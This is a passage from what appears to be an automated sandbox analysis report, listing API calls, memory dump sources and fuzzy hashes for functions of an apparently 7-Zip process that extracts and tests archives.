                                                                • Opcode Fuzzy Hash: 3c674b90aae9c7a3b63d2bdd2af22403dde61106ae7c1b39dd43b612bf24b9b2
                                                                • Instruction Fuzzy Hash: 4D513472204A4491CB18EF25D4902EE6721F7E9FC8F944123EB5E97729DF78CA9AC341
                                                                APIs
                                                                • fputs.MSVCRT ref: 001515D5
                                                                  • Part of subcall function 0015B1C8: memset.MSVCRT ref: 0015B20D
                                                                  • Part of subcall function 0015B1C8: fputs.MSVCRT ref: 0015B232
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: fputs$memset
                                                                • String ID: Extracting archive: $Open$Testing archive:
                                                                • API String ID: 3543874852-295398807
                                                                • Opcode ID: 9f4bf5ef788e6728e8579e5dfc2a785cb0374665964cbcc9bd9e207323b06e63
                                                                • Instruction ID: 370fb3f6193067be59ef653ead8893b63925a7b8a545c84d6f5c928eba981a4f
                                                                • Opcode Fuzzy Hash: 9f4bf5ef788e6728e8579e5dfc2a785cb0374665964cbcc9bd9e207323b06e63
                                                                • Instruction Fuzzy Hash: A9118C72342A82D5DF559B29D9843EC2360E75AB99F588436DE2E4A260EF39C4CAC310
                                                                APIs
                                                                • fputs.MSVCRT ref: 00152E47
                                                                • fputs.MSVCRT ref: 00152E57
                                                                • free.MSVCRT ref: 00152EA4
                                                                  • Part of subcall function 00152CFC: fputs.MSVCRT ref: 00152D41
                                                                  • Part of subcall function 00152CFC: fputs.MSVCRT ref: 00152DCF
                                                                  • Part of subcall function 00152CFC: free.MSVCRT ref: 00152DFF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: fputs$free
                                                                • String ID: =
                                                                • API String ID: 3873070119-2525689732
                                                                • Opcode ID: 4cca910cc9feef97d39b55c90a06b9effa51fec30a6b783ec7096b57ced3bdf6
                                                                • Instruction ID: 7d8ffb9934b038bffbc00de74819c6dfafb64279f04ca85d9780a289162e1248
                                                                • Opcode Fuzzy Hash: 4cca910cc9feef97d39b55c90a06b9effa51fec30a6b783ec7096b57ced3bdf6
                                                                • Instruction Fuzzy Hash: 18F0676230490090DA24EB66EA553BD5311A7D6FF5F049321ED7D0BBA8DF3CC556C700
                                                                APIs
                                                                • free.MSVCRT ref: 00144A5C
                                                                • free.MSVCRT ref: 00144A67
                                                                • free.MSVCRT ref: 00144AE4
                                                                  • Part of subcall function 00113314: memmove.MSVCRT ref: 00113339
                                                                • free.MSVCRT ref: 00144B0F
                                                                • free.MSVCRT ref: 00144B1A
                                                                  • Part of subcall function 00112130: malloc.MSVCRT ref: 00112134
                                                                  • Part of subcall function 00112130: _CxxThrowException.MSVCRT ref: 0011214F
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$ExceptionThrowmallocmemmove
                                                                • String ID:
                                                                • API String ID: 3352498445-0
                                                                • Opcode ID: cd356717b46294ebbf87faeea91df8213fb96c8abb4be4db24926ca1e4725612
                                                                • Instruction ID: 8e7e5b7a1cd34ccb2376464c9d9feb71c5014b2312def10560b1de2530a6a920
                                                                • Opcode Fuzzy Hash: cd356717b46294ebbf87faeea91df8213fb96c8abb4be4db24926ca1e4725612
                                                                • Instruction Fuzzy Hash: 8E416F23245B8492CB14EF25D4503AEB761FB9AB98F481132EB8E47729DF38C5A6C354
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ee94cdd725bc1b4db16937cbd8c93f2249c1c3cc61606458e41898ca9daa4340
                                                                • Instruction ID: fb4d21387237b67426bf5cc944dc1a746c17fb5e79a0cec70aad114efa953f0c
                                                                • Opcode Fuzzy Hash: ee94cdd725bc1b4db16937cbd8c93f2249c1c3cc61606458e41898ca9daa4340
                                                                • Instruction Fuzzy Hash: E8314F71614B41C6EB05DF28E89039A77B0F384BA6F504229EA6D4B7B4DB7CC58ACB40
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$fputsmemmove
                                                                • String ID:
                                                                • API String ID: 4106585527-0
                                                                • Opcode ID: de874a376c389c5634e5b3a271c24aa59135fb5864ed34f7a1f8a9b157696600
                                                                • Instruction ID: 43f4b93369c016cf77fbae99d9eeecc71f32d5a85f83469b0f975a63d7374f64
                                                                • Opcode Fuzzy Hash: de874a376c389c5634e5b3a271c24aa59135fb5864ed34f7a1f8a9b157696600
                                                                • Instruction Fuzzy Hash: B201526321884091DA24AB25E85119EA721E7E5BF4F045331FA6F876F8DF38C6D6C740
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: AttributesFilefree
                                                                • String ID:
                                                                • API String ID: 1936811914-0
                                                                • Opcode ID: 2ecb6214096e143b2484f2832f1280b3ab62ecd8edf6342453ae4ca911538852
                                                                • Instruction ID: 7963f2e2e6cc34fc7493893bb3ea0a059cbb3a4489bae34a432cdf2bcf7fa7e0
                                                                • Opcode Fuzzy Hash: 2ecb6214096e143b2484f2832f1280b3ab62ecd8edf6342453ae4ca911538852
                                                                • Instruction Fuzzy Hash: 9C01F722304611D2C638AB2199802FE17249BD67F4F580335EE79873A4CF35CDC79710
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: AttributesFilefree
                                                                • String ID:
                                                                • API String ID: 1936811914-0
                                                                • Opcode ID: 90b61e9f4f0805f8493b7b2730efc4ecc0887a88725c8ba3c0691ab996cf754b
                                                                • Instruction ID: d79ec9eae2fe6efc4434c45fbd5b6e9d08ca9e029286a0a5e2cdd9fb63135cea
                                                                • Opcode Fuzzy Hash: 90b61e9f4f0805f8493b7b2730efc4ecc0887a88725c8ba3c0691ab996cf754b
                                                                • Instruction Fuzzy Hash: 47F04966208A4481C934AB75AD902FD56309FDA7F4F580334EA79877F5DF24C9C68700
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$memmove
                                                                • String ID:
                                                                • API String ID: 1534225298-0
                                                                • Opcode ID: e8f9cdc7cbc43501b9a821d31bcf444afd51c02bda1371c1c9b7f3f0ed001691
                                                                • Instruction ID: 3989a1390ac8bc32e5928abe4c6a461529b6a6e921fe0c7ad8368323b1ab739f
                                                                • Opcode Fuzzy Hash: e8f9cdc7cbc43501b9a821d31bcf444afd51c02bda1371c1c9b7f3f0ed001691
                                                                • Instruction Fuzzy Hash: EF518C72704A80D7CB34DB26E88029DB361F789BD4F404226EBAE47B59DF38D5A5CB44
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: 2703c9f3fbddb521d8c4c51cfedb35860992798216a6655cd283f4a4fda484df
                                                                • Instruction ID: 8e9f52d955bf5cb1464e929c2c90714dd85ad870f86d3f3e92ff4d2ffaf85a3d
                                                                • Opcode Fuzzy Hash: 2703c9f3fbddb521d8c4c51cfedb35860992798216a6655cd283f4a4fda484df
                                                                • Instruction Fuzzy Hash: 5731E0637156849ACB24EF16E48046EA7A1F7987A0F589235FF9E47758DF78C882CB00
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: 2fb1bdadda0f0f67c2ab4cf383632212aedf00074fa5b7e75f5519585e2e69a4
                                                                • Instruction ID: 30e4dfcbd2c44c9778be3d01c9c62957147838fdb1b06f756b53dc13cf2de114
                                                                • Opcode Fuzzy Hash: 2fb1bdadda0f0f67c2ab4cf383632212aedf00074fa5b7e75f5519585e2e69a4
                                                                • Instruction Fuzzy Hash: D1118A2220854051DE14EB65E5512EAA760EFE13F0F801371BBEE876E9DF68C98BCB00
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$ExceptionThrowmemmove
                                                                • String ID:
                                                                • API String ID: 3934437811-0
                                                                • Opcode ID: 3a97ebef2fcd1cdc2599d13047a49bc923f0f8c10aefa58592d67d2e468ee3f2
                                                                • Instruction ID: 7f9f0424970c8e2068ee413d5525e5f8617a2a08197c77d04782e3674c0047e2
                                                                • Opcode Fuzzy Hash: 3a97ebef2fcd1cdc2599d13047a49bc923f0f8c10aefa58592d67d2e468ee3f2
                                                                • Instruction Fuzzy Hash: 50117F637046809BCA24DF25E85039EA760EB927A4F484325EFAD0B7A9DF78C54AC700
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: 2682a3d483ed8198c6bc67279e3496169ab0818a4c7350e9ba69b47f62e70939
                                                                • Instruction ID: c7321116f96d43de1c0fb953226acfeab4264541b71507c14d80d5933223d87e
                                                                • Opcode Fuzzy Hash: 2682a3d483ed8198c6bc67279e3496169ab0818a4c7350e9ba69b47f62e70939
                                                                • Instruction Fuzzy Hash: BF01C82220454491CD24EB22F4551EE9721EBD67E4F481331BEAE576A9CF38C5CAC704
                                                                APIs
                                                                  • Part of subcall function 001189D8: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,?,?,?,00000003,?,00000000,00000000), ref: 001189EA
                                                                • CreateFileW.KERNELBASE ref: 00118D51
                                                                • CreateFileW.KERNEL32 ref: 00118DA4
                                                                • free.MSVCRT ref: 00118DB2
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: CreateFile$CloseHandlefree
                                                                • String ID:
                                                                • API String ID: 210839660-0
                                                                • Opcode ID: 61d1414c3204940837fafab39737341ec41e4676ab64096d397cf1e7feeedc36
                                                                • Instruction ID: 482c296e9630c003e75f4e1b10ac7bf22a2d1a1bd9dfba1f7bb7e899f0deb485
                                                                • Opcode Fuzzy Hash: 61d1414c3204940837fafab39737341ec41e4676ab64096d397cf1e7feeedc36
                                                                • Instruction Fuzzy Hash: CF217F33104A819ACB649F55B84169AAB24B3A67F4F544335EFB947BE4CF38C8D68B00
                                                                APIs
                                                                  • Part of subcall function 00113274: memmove.MSVCRT ref: 001132AC
                                                                • fputs.MSVCRT ref: 00152D41
                                                                • fputs.MSVCRT ref: 00152DCF
                                                                • free.MSVCRT ref: 00152DFF
                                                                  • Part of subcall function 00112300: fputc.MSVCRT ref: 00112311
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: fputs$fputcfreememmove
                                                                • String ID:
                                                                • API String ID: 1158454270-0
                                                                • Opcode ID: ce718a67f578e75b63cebf5a55997fc31d3fdfa31f102c43e696e4c730ade246
                                                                • Instruction ID: e980f6f2d4b82c38ef2ef920d1b5f56e9b3c6993cb904fe8eb4e1ecd011480d8
                                                                • Opcode Fuzzy Hash: ce718a67f578e75b63cebf5a55997fc31d3fdfa31f102c43e696e4c730ade246
                                                                • Instruction Fuzzy Hash: 75213162214A0181CF24EF65E8512AE6331FBA9BE5F489231EE6B4B768DF3CC595C700
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$memmove
                                                                • String ID:
                                                                • API String ID: 3796167841-0
                                                                • Opcode ID: 13b8521f385784011c78b9d11a16baa524cd611e63a74d569e705e2f10fdf046
                                                                • Instruction ID: c0ed506025fdb27bac7d144ba2160e6f8f6e7e3cece57a28e337c53aef804026
                                                                • Opcode Fuzzy Hash: 13b8521f385784011c78b9d11a16baa524cd611e63a74d569e705e2f10fdf046
                                                                • Instruction Fuzzy Hash: 43519132351B55A7DB2D8E3AE5447E923A0FB48794F140136EF0A87B50DB39E8E6C740
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: fputc
                                                                • String ID: Kernel
                                                                • API String ID: 1992160199-1736990243
                                                                • Opcode ID: 0587dab81f2bb3112332d7aab628a035a02b5f4d8aa9838a9d6f6812646a1732
                                                                • Instruction ID: 4cc9d0c7d4c05421a64c1f02c66b7190704da4da00a8d98701f37d0dd06e68be
                                                                • Opcode Fuzzy Hash: 0587dab81f2bb3112332d7aab628a035a02b5f4d8aa9838a9d6f6812646a1732
                                                                • Instruction Fuzzy Hash: 88C09B55751A08C2FF1417B7EC453651211D75DF91F185034CE1D0B350D91CD4D7C711
                                                                APIs
                                                                • memset.MSVCRT ref: 0015B20D
                                                                • fputs.MSVCRT ref: 0015B232
                                                                  • Part of subcall function 00112B04: _CxxThrowException.MSVCRT ref: 00112B2D
                                                                  • Part of subcall function 00112B04: free.MSVCRT ref: 00112B44
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: ExceptionThrowfputsfreememset
                                                                • String ID:
                                                                • API String ID: 3104931167-0
                                                                • Opcode ID: 4ef15fd8aa1144054d3f8c1e688ea89a0331c1f98529cff2cb93b1434cf32894
                                                                • Instruction ID: 0658846f63c6d8233235909349bf3c2d9af3bde780ef64e2493d311abe35ae78
                                                                • Opcode Fuzzy Hash: 4ef15fd8aa1144054d3f8c1e688ea89a0331c1f98529cff2cb93b1434cf32894
                                                                • Instruction Fuzzy Hash: CE01A17770469096E709DF66EAC075E2720F769B95F088022DF180B711DB74E8AAC320
                                                                APIs
                                                                • SetFilePointer.KERNELBASE(?,?,00000003,?,00118E1D), ref: 00118A99
                                                                • GetLastError.KERNEL32(?,?,00000003,?,00118E1D), ref: 00118AA6
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: ErrorFileLastPointer
                                                                • String ID:
                                                                • API String ID: 2976181284-0
                                                                • Opcode ID: cf0d94ecf42caac14694387020930a2bb5976bb2b97546524ee3b67299013e46
                                                                • Instruction ID: 976350a83a513fd569363f7791b4e40c52d6b4b09b99a3b6c2debdbf52d5c717
                                                                • Opcode Fuzzy Hash: cf0d94ecf42caac14694387020930a2bb5976bb2b97546524ee3b67299013e46
                                                                • Instruction Fuzzy Hash: 4EF0FC72B117C0C3DF288B69E8847992751EF5A799F6C8432CA0847750DF29C8C2C710
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: fputcfputsfree
                                                                • String ID:
                                                                • API String ID: 2822829076-0
                                                                • Opcode ID: e0bb0529e73891d184958c91263af9b458e0cdb2801925c14b56b99b46a72feb
                                                                • Instruction ID: b74256c03249bb7849219dc0d4a7411ee3e65a2d75526261c467dbf0e0cf9905
                                                                • Opcode Fuzzy Hash: e0bb0529e73891d184958c91263af9b458e0cdb2801925c14b56b99b46a72feb
                                                                • Instruction Fuzzy Hash: 2BF0FE6260494480CA25DF25E9553599320E799BF9F484321EE6D477E9DF38C99AC700
                                                                APIs
                                                                • memmove.MSVCRT ref: 0014404D
                                                                • memmove.MSVCRT ref: 00144087
                                                                  • Part of subcall function 00113404: free.MSVCRT ref: 00113431
                                                                  • Part of subcall function 00113404: memmove.MSVCRT ref: 0011344C
                                                                  • Part of subcall function 00112130: malloc.MSVCRT ref: 00112134
                                                                  • Part of subcall function 00112130: _CxxThrowException.MSVCRT ref: 0011214F
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: memmove$ExceptionThrowfreemalloc
                                                                • String ID:
                                                                • API String ID: 1415420288-0
                                                                • Opcode ID: 96e44e9e5a32ed725eb072e1cfbeb8874b8d10a423f6c5ce45c1c81385b624aa
                                                                • Instruction ID: 3791421e977c0eccaaac51cff280554c482d0a6157d35842ae47c5c8a071e2ca
                                                                • Opcode Fuzzy Hash: 96e44e9e5a32ed725eb072e1cfbeb8874b8d10a423f6c5ce45c1c81385b624aa
                                                                • Instruction Fuzzy Hash: 2E31A2673096C197CA35EF54E1942EEB720F3A5740F404422DB9D47B69EF38D69ACB00
                                                                APIs
                                                                • memmove.MSVCRT ref: 00144065
                                                                • memmove.MSVCRT ref: 00144087
                                                                  • Part of subcall function 00113404: free.MSVCRT ref: 00113431
                                                                  • Part of subcall function 00113404: memmove.MSVCRT ref: 0011344C
                                                                  • Part of subcall function 00112130: malloc.MSVCRT ref: 00112134
                                                                  • Part of subcall function 00112130: _CxxThrowException.MSVCRT ref: 0011214F
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
